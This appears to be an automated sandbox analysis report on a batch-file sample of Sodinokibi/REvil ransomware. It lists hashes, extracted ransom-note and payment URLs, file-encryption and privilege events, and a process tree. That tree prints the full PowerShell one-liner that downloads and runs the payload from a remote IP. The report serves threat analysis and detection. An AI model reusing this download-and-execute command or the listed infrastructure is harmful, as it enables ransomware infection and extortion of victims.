Analysis
-
max time kernel
42s -
max time network
37s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
22-08-2020 02:10
Static task
static1
Behavioral task
behavioral1
Sample
1c69f4f012b140cb5a8804fe58a41126.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
1c69f4f012b140cb5a8804fe58a41126.bat
Resource
win10v200722
General
-
Target
1c69f4f012b140cb5a8804fe58a41126.bat
-
Size
221B
-
MD5
88eb700e439d918adcecb389a5bcf6b8
-
SHA1
905eec03268857b86e52a8510eb71ca499d75361
-
SHA256
a80c7d0195818572a4440425811e01f0f8259566df0d77c4ef7a928c64de77ce
-
SHA512
6c1bbe97ea867f670d521a108db6fb0cbde85c34d10b53746b16514eaa58f8e96166e105a2d4d75bfe505af85635e4670bfbdf89f0789bfa5cebdc4bf53a4755
Malware Config
Extracted
http://185.103.242.78/pastes/1c69f4f012b140cb5a8804fe58a41126
Extracted
C:\bfu354-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/46C78E03B01CE246
http://decryptor.cc/46C78E03B01CE246
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1028 powershell.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\EnableConfirm.tiff powershell.exe File renamed C:\Users\Admin\Pictures\EnableConfirm.tiff => \??\c:\users\admin\pictures\EnableConfirm.tiff.bfu354 powershell.exe File opened for modification \??\c:\users\admin\pictures\StopDismount.tiff powershell.exe File renamed C:\Users\Admin\Pictures\ReadExpand.raw => \??\c:\users\admin\pictures\ReadExpand.raw.bfu354 powershell.exe File renamed C:\Users\Admin\Pictures\StopDismount.tiff => \??\c:\users\admin\pictures\StopDismount.tiff.bfu354 powershell.exe File renamed C:\Users\Admin\Pictures\SkipRevoke.raw => \??\c:\users\admin\pictures\SkipRevoke.raw.bfu354 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kouk9y3.bmp" powershell.exe -
Drops file in Program Files directory 24 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\DebugRevoke.ttf powershell.exe File opened for modification \??\c:\program files\InstallNew.3gp powershell.exe File opened for modification \??\c:\program files\LimitProtect.jpeg powershell.exe File opened for modification \??\c:\program files\MeasureExpand.reg powershell.exe File opened for modification \??\c:\program files\RestoreRemove.vstx powershell.exe File opened for modification \??\c:\program files\SubmitRestart.wdp powershell.exe File created \??\c:\program files (x86)\bfu354-readme.txt powershell.exe File opened for modification \??\c:\program files\ApproveCopy.xml powershell.exe File opened for modification \??\c:\program files\SubmitUnregister.ods powershell.exe File opened for modification \??\c:\program files\SwitchSplit.docm powershell.exe File opened for modification \??\c:\program files\SwitchStop.css powershell.exe File opened for modification \??\c:\program files\TraceRestart.edrwx powershell.exe File opened for modification \??\c:\program files\UnprotectEnable.3gp powershell.exe File opened for modification \??\c:\program files\DenyInitialize.css powershell.exe File opened for modification \??\c:\program files\MountResume.DVR powershell.exe File opened for modification \??\c:\program files\NewMeasure.xps powershell.exe File opened for modification \??\c:\program files\RestoreStep.tmp powershell.exe File opened for modification \??\c:\program files\TestRevoke.css powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\bfu354-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\bfu354-readme.txt powershell.exe File opened for modification \??\c:\program files\FormatExport.mp2v powershell.exe File created \??\c:\program files\microsoft sql server compact edition\bfu354-readme.txt powershell.exe File created \??\c:\program files\bfu354-readme.txt powershell.exe File opened for modification \??\c:\program files\CopyConfirm.mht powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1028 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1028 powershell.exe 1028 powershell.exe 1028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1028 powershell.exe Token: SeDebugPrivilege 1028 powershell.exe Token: SeTakeOwnershipPrivilege 1028 powershell.exe Token: SeBackupPrivilege 1820 vssvc.exe Token: SeRestorePrivilege 1820 vssvc.exe Token: SeAuditPrivilege 1820 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1156 wrote to memory of 1028 1156 cmd.exe powershell.exe PID 1156 wrote to memory of 1028 1156 cmd.exe powershell.exe PID 1156 wrote to memory of 1028 1156 cmd.exe powershell.exe PID 1156 wrote to memory of 1028 1156 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1c69f4f012b140cb5a8804fe58a41126.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1c69f4f012b140cb5a8804fe58a41126');Invoke-QVZIJBUKUSJYIH;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1820